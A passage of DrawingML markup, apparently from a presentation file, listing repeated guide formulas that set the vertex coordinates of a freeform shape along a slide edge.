              <a:gd name="connsiteX63" fmla="*/ 462990 w 1349253"/>
              <a:gd name="connsiteY63" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 460248 w 1349253"/>
              <a:gd name="connsiteY64" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 461981 w 1349253"/>
              <a:gd name="connsiteY65" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 465724 w 1349253"/>
              <a:gd name="connsiteY66" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 473886 w 1349253"/>
              <a:gd name="connsiteY67" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 481232 w 1349253"/>
              <a:gd name="connsiteY68" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 480528 w 1349253"/>
              <a:gd name="connsiteY69" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 483971 w 1349253"/>
              <a:gd name="connsiteY70" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 491509 w 1349253"/>
              <a:gd name="connsiteY71" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 505401 w 1349253"/>
              <a:gd name="connsiteY72" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 511168 w 1349253"/>
              <a:gd name="connsiteY73" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 487927 w 1349253"/>
              <a:gd name="connsiteY74" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 473112 w 1349253"/>
              <a:gd name="connsiteY75" fmla="*/ 3129034 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 473777 w 1349253"/>
              <a:gd name="connsiteY76" fmla="*/ 3126682 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 451254 w 1349253"/>
              <a:gd name="connsiteY77" fmla="*/ 3106272 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 423984 w 1349253"/>
              <a:gd name="connsiteY78" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 381264 w 1349253"/>
              <a:gd name="connsiteY79" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 315516 w 1349253"/>
              <a:gd name="connsiteY80" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 286333 w 1349253"/>
              <a:gd name="connsiteY81" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 273294 w 1349253"/>
              <a:gd name="connsiteY82" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 279293 w 1349253"/>
              <a:gd name="connsiteY83" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 281905 w 1349253"/>
              <a:gd name="connsiteY84" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 258234 w 1349253"/>
              <a:gd name="connsiteY85" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 248121 w 1349253"/>
              <a:gd name="connsiteY86" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 232338 w 1349253"/>
              <a:gd name="connsiteY87" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 229796 w 1349253"/>
              <a:gd name="connsiteY88" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 230789 w 1349253"/>
              <a:gd name="connsiteY89" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 222595 w 1349253"/>
              <a:gd name="connsiteY90" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 203773 w 1349253"/>
              <a:gd name="connsiteY91" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 180330 w 1349253"/>
              <a:gd name="connsiteY92" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 134129 w 1349253"/>
              <a:gd name="connsiteY93" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 106440 w 1349253"/>
              <a:gd name="connsiteY94" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 105566 w 1349253"/>
              <a:gd name="connsiteY95" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 86361 w 1349253"/>
              <a:gd name="connsiteY96" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 92183 w 1349253"/>
              <a:gd name="connsiteY97" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 78268 w 1349253"/>
              <a:gd name="connsiteY98" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 86575 w 1349253"/>
              <a:gd name="connsiteY99" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 87763 w 1349253"/>
              <a:gd name="connsiteY100" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 92448 w 1349253"/>
              <a:gd name="connsiteY101" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 84730 w 1349253"/>
              <a:gd name="connsiteY102" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 74036 w 1349253"/>
              <a:gd name="connsiteY103" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 62772 w 1349253"/>
              <a:gd name="connsiteY104" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 64228 w 1349253"/>
              <a:gd name="connsiteY105" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 75144 w 1349253"/>
              <a:gd name="connsiteY106" fmla="*/ 921368 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 59093 w 1349253"/>
              <a:gd name="connsiteY107" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 28501 w 1349253"/>
              <a:gd name="connsiteY108" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 7451 w 1349253"/>
              <a:gd name="connsiteY109" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 7009 w 1349253"/>
              <a:gd name="connsiteY110" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 16141 w 1349253"/>
              <a:gd name="connsiteY111" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 19 w 1349253"/>
              <a:gd name="connsiteY112" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX113" fmla="*/ 7093 w 1349253"/>
              <a:gd name="connsiteY113" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX114" fmla="*/ 11001 w 1349253"/>
              <a:gd name="connsiteY114" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX115" fmla="*/ 37125 w 1349253"/>
              <a:gd name="connsiteY115" fmla="*/ 446567 h 6858000"/>
              <a:gd name="connsiteX116" fmla="*/ 36373 w 1349253"/>
              <a:gd name="connsiteY116" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX117" fmla="*/ 36203 w 1349253"/>
              <a:gd name="connsiteY117" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX118" fmla="*/ 41896 w 1349253"/>
              <a:gd name="connsiteY118" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX119" fmla="*/ 58923 w 1349253"/>
              <a:gd name="connsiteY119" fmla="*/ 212860 h 6858000"/>
              <a:gd name="connsiteX120" fmla="*/ 50633 w 1349253"/>
              <a:gd name="connsiteY120" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX121" fmla="*/ 62917 w 1349253"/>
              <a:gd name="connsiteY121" fmla="*/ 55288 h 6858000"/>
              <a:gd name="connsiteX122" fmla="*/ 22471 w 1349253"/>
              <a:gd name="connsiteY122" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 22471 w 1349253"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1349253 w 1349253"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1349253 w 1349253"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 85947 w 1349253"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 122540 w 1349253"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 134040 w 1349253"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 158779 w 1349253"/>
              <a:gd name="connsiteY6" fmla="*/ 6691589 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 150803 w 1349253"/>
              <a:gd name="connsiteY7" fmla="*/ 6659970 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 151427 w 1349253"/>
              <a:gd name="connsiteY8" fmla="*/ 6636211 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 168871 w 1349253"/>
              <a:gd name="connsiteY9" fmla="*/ 6594177 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 182911 w 1349253"/>
              <a:gd name="connsiteY10" fmla="*/ 6557575 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 235868 w 1349253"/>
              <a:gd name="connsiteY11" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 251555 w 1349253"/>
              <a:gd name="connsiteY12" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 295260 w 1349253"/>
              <a:gd name="connsiteY13" fmla="*/ 6379786 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 278483 w 1349253"/>
              <a:gd name="connsiteY14" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 255898 w 1349253"/>
              <a:gd name="connsiteY15" fmla="*/ 6313295 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 263062 w 1349253"/>
              <a:gd name="connsiteY16" fmla="*/ 6280046 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 266061 w 1349253"/>
              <a:gd name="connsiteY17" fmla="*/ 6272987 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 272835 w 1349253"/>
              <a:gd name="connsiteY18" fmla="*/ 6252834 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 250827 w 1349253"/>
              <a:gd name="connsiteY19" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 249625 w 1349253"/>
              <a:gd name="connsiteY20" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 265040 w 1349253"/>
              <a:gd name="connsiteY21" fmla="*/ 6078132 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 252427 w 1349253"/>
              <a:gd name="connsiteY22" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 237656 w 1349253"/>
              <a:gd name="connsiteY23" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 287168 w 1349253"/>
              <a:gd name="connsiteY24" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 316966 w 1349253"/>
              <a:gd name="connsiteY25" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 326089 w 1349253"/>
              <a:gd name="connsiteY26" fmla="*/ 5563435 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 352965 w 1349253"/>
              <a:gd name="connsiteY27" fmla="*/ 5437125 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 366533 w 1349253"/>
              <a:gd name="connsiteY28" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 382514 w 1349253"/>
              <a:gd name="connsiteY29" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 416007 w 1349253"/>
              <a:gd name="connsiteY30" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 425606 w 1349253"/>
              <a:gd name="connsiteY31" fmla="*/ 5241779 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 436832 w 1349253"/>
              <a:gd name="connsiteY32" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 437852 w 1349253"/>
              <a:gd name="connsiteY33" fmla="*/ 5217684 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 445193 w 1349253"/>
              <a:gd name="connsiteY34" fmla="*/ 5193377 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 448496 w 1349253"/>
              <a:gd name="connsiteY35" fmla="*/ 5179288 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 449480 w 1349253"/>
              <a:gd name="connsiteY36" fmla="*/ 5173621 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 445114 w 1349253"/>
              <a:gd name="connsiteY37" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 451791 w 1349253"/>
              <a:gd name="connsiteY38" fmla="*/ 5144295 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 448724 w 1349253"/>
              <a:gd name="connsiteY39" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 455554 w 1349253"/>
              <a:gd name="connsiteY40" fmla="*/ 5121884 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 462590 w 1349253"/>
              <a:gd name="connsiteY41" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 465321 w 1349253"/>
              <a:gd name="connsiteY42" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 462025 w 1349253"/>
              <a:gd name="connsiteY43" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 463579 w 1349253"/>
              <a:gd name="connsiteY44" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 470488 w 1349253"/>
              <a:gd name="connsiteY45" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 466344 w 1349253"/>
              <a:gd name="connsiteY46" fmla="*/ 4932692 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 481747 w 1349253"/>
              <a:gd name="connsiteY47" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 487650 w 1349253"/>
              <a:gd name="connsiteY48" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 492383 w 1349253"/>
              <a:gd name="connsiteY49" fmla="*/ 4780965 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 493676 w 1349253"/>
              <a:gd name="connsiteY50" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 491483 w 1349253"/>
              <a:gd name="connsiteY51" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 486963 w 1349253"/>
              <a:gd name="connsiteY52" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 482046 w 1349253"/>
              <a:gd name="connsiteY53" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 478611 w 1349253"/>
              <a:gd name="connsiteY54" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 459264 w 1349253"/>
              <a:gd name="connsiteY55" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 463337 w 1349253"/>
              <a:gd name="connsiteY56" fmla="*/ 4090296 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 448593 w 1349253"/>
              <a:gd name="connsiteY57" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 448318 w 1349253"/>
              <a:gd name="connsiteY58" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 434613 w 1349253"/>
              <a:gd name="connsiteY59" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 429633 w 1349253"/>
              <a:gd name="connsiteY60" fmla="*/ 3933779 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 440396 w 1349253"/>
              <a:gd name="connsiteY61" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 462990 w 1349253"/>
              <a:gd name="connsiteY62" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 460248 w 1349253"/>
              <a:gd name="connsiteY63" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 461981 w 1349253"/>
              <a:gd name="connsiteY64" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 465724 w 1349253"/>
              <a:gd name="connsiteY65" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 473886 w 1349253"/>
              <a:gd name="connsiteY66" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 481232 w 1349253"/>
              <a:gd name="connsiteY67" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 480528 w 1349253"/>
              <a:gd name="connsiteY68" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 483971 w 1349253"/>
              <a:gd name="connsiteY69" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 491509 w 1349253"/>
              <a:gd name="connsiteY70" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 505401 w 1349253"/>
              <a:gd name="connsiteY71" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 511168 w 1349253"/>
              <a:gd name="connsiteY72" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 487927 w 1349253"/>
              <a:gd name="connsiteY73" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 473112 w 1349253"/>
              <a:gd name="connsiteY74" fmla="*/ 3129034 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 473777 w 1349253"/>
              <a:gd name="connsiteY75" fmla="*/ 3126682 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 451254 w 1349253"/>
              <a:gd name="connsiteY76" fmla="*/ 3106272 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 423984 w 1349253"/>
              <a:gd name="connsiteY77" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 381264 w 1349253"/>
              <a:gd name="connsiteY78" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 315516 w 1349253"/>
              <a:gd name="connsiteY79" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 286333 w 1349253"/>
              <a:gd name="connsiteY80" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 273294 w 1349253"/>
              <a:gd name="connsiteY81" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 279293 w 1349253"/>
              <a:gd name="connsiteY82" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 281905 w 1349253"/>
              <a:gd name="connsiteY83" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 258234 w 1349253"/>
              <a:gd name="connsiteY84" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 248121 w 1349253"/>
              <a:gd name="connsiteY85" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 232338 w 1349253"/>
              <a:gd name="connsiteY86" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 229796 w 1349253"/>
              <a:gd name="connsiteY87" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 230789 w 1349253"/>
              <a:gd name="connsiteY88" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 222595 w 1349253"/>
              <a:gd name="connsiteY89" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 203773 w 1349253"/>
              <a:gd name="connsiteY90" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 180330 w 1349253"/>
              <a:gd name="connsiteY91" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 134129 w 1349253"/>
              <a:gd name="connsiteY92" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 106440 w 1349253"/>
              <a:gd name="connsiteY93" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 105566 w 1349253"/>
              <a:gd name="connsiteY94" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 86361 w 1349253"/>
              <a:gd name="connsiteY95" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 92183 w 1349253"/>
              <a:gd name="connsiteY96" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 78268 w 1349253"/>
              <a:gd name="connsiteY97" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 86575 w 1349253"/>
              <a:gd name="connsiteY98" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 87763 w 1349253"/>
              <a:gd name="connsiteY99" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 92448 w 1349253"/>
              <a:gd name="connsiteY100" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 84730 w 1349253"/>
              <a:gd name="connsiteY101" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 74036 w 1349253"/>
              <a:gd name="connsiteY102" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 62772 w 1349253"/>
              <a:gd name="connsiteY103" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 64228 w 1349253"/>
              <a:gd name="connsiteY104" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 75144 w 1349253"/>
              <a:gd name="connsiteY105" fmla="*/ 921368 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 59093 w 1349253"/>
              <a:gd name="connsiteY106" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 28501 w 1349253"/>
              <a:gd name="connsiteY107" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 7451 w 1349253"/>
              <a:gd name="connsiteY108" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 7009 w 1349253"/>
              <a:gd name="connsiteY109" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 16141 w 1349253"/>
              <a:gd name="connsiteY110" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 19 w 1349253"/>
              <a:gd name="connsiteY111" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 7093 w 1349253"/>
              <a:gd name="connsiteY112" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX113" fmla="*/ 11001 w 1349253"/>
              <a:gd name="connsiteY113" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX114" fmla="*/ 37125 w 1349253"/>
              <a:gd name="connsiteY114" fmla="*/ 446567 h 6858000"/>
              <a:gd name="connsiteX115" fmla="*/ 36373 w 1349253"/>
              <a:gd name="connsiteY115" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX116" fmla="*/ 36203 w 1349253"/>
              <a:gd name="connsiteY116" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX117" fmla="*/ 41896 w 1349253"/>
              <a:gd name="connsiteY117" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX118" fmla="*/ 58923 w 1349253"/>
              <a:gd name="connsiteY118" fmla="*/ 212860 h 6858000"/>
              <a:gd name="connsiteX119" fmla="*/ 50633 w 1349253"/>
              <a:gd name="connsiteY119" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX120" fmla="*/ 62917 w 1349253"/>
              <a:gd name="connsiteY120" fmla="*/ 55288 h 6858000"/>
              <a:gd name="connsiteX121" fmla="*/ 22471 w 1349253"/>
              <a:gd name="connsiteY121" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 22471 w 1349253"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1349253 w 1349253"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1349253 w 1349253"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 85947 w 1349253"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 122540 w 1349253"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 134040 w 1349253"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 158779 w 1349253"/>
              <a:gd name="connsiteY6" fmla="*/ 6691589 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 150803 w 1349253"/>
              <a:gd name="connsiteY7" fmla="*/ 6659970 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 151427 w 1349253"/>
              <a:gd name="connsiteY8" fmla="*/ 6636211 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 168871 w 1349253"/>
              <a:gd name="connsiteY9" fmla="*/ 6594177 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 182911 w 1349253"/>
              <a:gd name="connsiteY10" fmla="*/ 6557575 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 235868 w 1349253"/>
              <a:gd name="connsiteY11" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 251555 w 1349253"/>
              <a:gd name="connsiteY12" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 295260 w 1349253"/>
              <a:gd name="connsiteY13" fmla="*/ 6379786 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 278483 w 1349253"/>
              <a:gd name="connsiteY14" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 255898 w 1349253"/>
              <a:gd name="connsiteY15" fmla="*/ 6313295 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 263062 w 1349253"/>
              <a:gd name="connsiteY16" fmla="*/ 6280046 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 266061 w 1349253"/>
              <a:gd name="connsiteY17" fmla="*/ 6272987 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 272835 w 1349253"/>
              <a:gd name="connsiteY18" fmla="*/ 6252834 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 250827 w 1349253"/>
              <a:gd name="connsiteY19" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 249625 w 1349253"/>
              <a:gd name="connsiteY20" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 265040 w 1349253"/>
              <a:gd name="connsiteY21" fmla="*/ 6078132 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 252427 w 1349253"/>
              <a:gd name="connsiteY22" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 237656 w 1349253"/>
              <a:gd name="connsiteY23" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 287168 w 1349253"/>
              <a:gd name="connsiteY24" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 316966 w 1349253"/>
              <a:gd name="connsiteY25" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 326089 w 1349253"/>
              <a:gd name="connsiteY26" fmla="*/ 5563435 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 352965 w 1349253"/>
              <a:gd name="connsiteY27" fmla="*/ 5437125 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 366533 w 1349253"/>
              <a:gd name="connsiteY28" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 382514 w 1349253"/>
